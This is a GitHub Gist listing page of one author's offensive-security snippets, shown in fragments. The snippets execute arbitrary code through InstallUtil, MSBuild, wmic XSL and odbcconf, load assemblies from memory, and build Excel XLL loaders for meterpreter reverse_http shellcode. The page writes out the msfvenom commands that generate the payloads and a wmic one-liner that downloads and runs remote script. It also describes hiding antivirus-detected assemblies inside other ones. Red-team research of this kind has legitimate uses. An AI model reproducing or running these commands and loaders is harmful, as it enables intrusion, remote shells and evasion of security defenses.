Skip to content

Instantly share code, notes, and snippets.


Block or report user

Report or block Arno0x

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
Arno0x / installUtil.cs
Created Sep 26, 2017
Example of a C# DLL to be used with the InstallUtil utility to make it execute some arbitrary code
View installUtil.cs
Author: Arno0x0x, Twitter: @Arno0x0x
===================================== COMPILING =====================================
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /unsafe /out:installUtil.dll installUtil.cs
===================================== USAGE =====================================
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logtoconsole=false /logfile= /u installUtil.dll
Arno0x / msbuild.xml
Created Nov 17, 2017
MSBuild project definition to execute arbitrary code from msbuild.exe
View msbuild.xml
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml -->
<Target Name="Hello">
<SharpLauncher >
Arno0x / TestAssembly.cs
Last active Aug 6, 2019
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
View TestAssembly.cs
================================ Compile as a .Net DLL ==============================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs
using System.Windows.Forms;
namespace TestNamespace
View shellcode_ExcelRegisterXLL.c
// Compile with: cl.exe x86_meterpreter_reverse_http.c /LD /o x86_meterpreter_reverse_http.xll
#include <Windows.h>
__declspec(dllexport) void __cdecl xlAutoOpen(void);
DWORD WINAPI ThreadFunction(LPVOID lpParameter)
// Payload obtained via "msfvenom -a x86 -p windows/meterpreter/reverse_http LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f c"
unsigned char b[] =
View shellcode_multibyteXOR_ExcelRegisterXLL.c
// Compile with:
// cl.exe x86_meterpreter_reverse_http_xor.c /LD /o x86_meterpreter_reverse_http_xor.xll
// C/CPP code obtained like this:
// 1. Get a raw meterpreter shellcode:
// msfvenom -a x86 -p windows/meterpreter/reverse_http LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai > met_rev_winhttp_x86.raw
// 2. Encrypt it with a custom multibyte XOR string (
// ./ -cpp met_rev_winhttp_x86.raw testkey xor
#include <Windows.h>
Arno0x / detected.cs
Last active Aug 1, 2019
Hiding an AV detected assembly into another one
View detected.cs
Author: Arno0x0x, Twitter: @Arno0x0x
===================================== COMPILING =====================================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:detected.exe detected.cs
using System.Diagnostics;
using System.Runtime.InteropServices;
Arno0x / wmic.xsl
Created Apr 18, 2018
Oneliner for arbitrary code download and execution
View wmic.xsl
<?xml version='1.0'?>
<!-- Discovered by @SubTee and @mattifestation -->
<!-- Execute with: wmic os get /format:"https://webserver/wmic.xsl" -->
xmlns="" xmlns:ms="urn:schemas-microsoft-com:xslt"
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
Arno0x /
Last active Jul 15, 2019
Performs multiple useful transformation on files
# -*- coding: utf8 -*-
# Author: Arno0x0x, Twitter: @Arno0x0x
import argparse
from Crypto.Cipher import AES
import pyscrypt
from base64 import b64encode
Arno0x / odbcconf.cs
Created Nov 22, 2017
Download and execute arbitrary code with odbcconf.exe
View odbcconf.cs
To use with odbcconf.exe:
odbcconf /S /A {REGSVR odbcconf.dll}
or, from a remote location (if WebDAV support enabled):
odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
using System;
Arno0x / malicious.cs
Last active Jun 25, 2019
Hide malicious assembly in another one with RunTime code compiling
View malicious.cs
Author: Arno0x0x, Twitter: @Arno0x0x
Encode this source in base64:
base64 -w0 malicious.cs > malicious.b64
Then paste it in the code in "not_detected.cs" source file
You can’t perform that action at this time.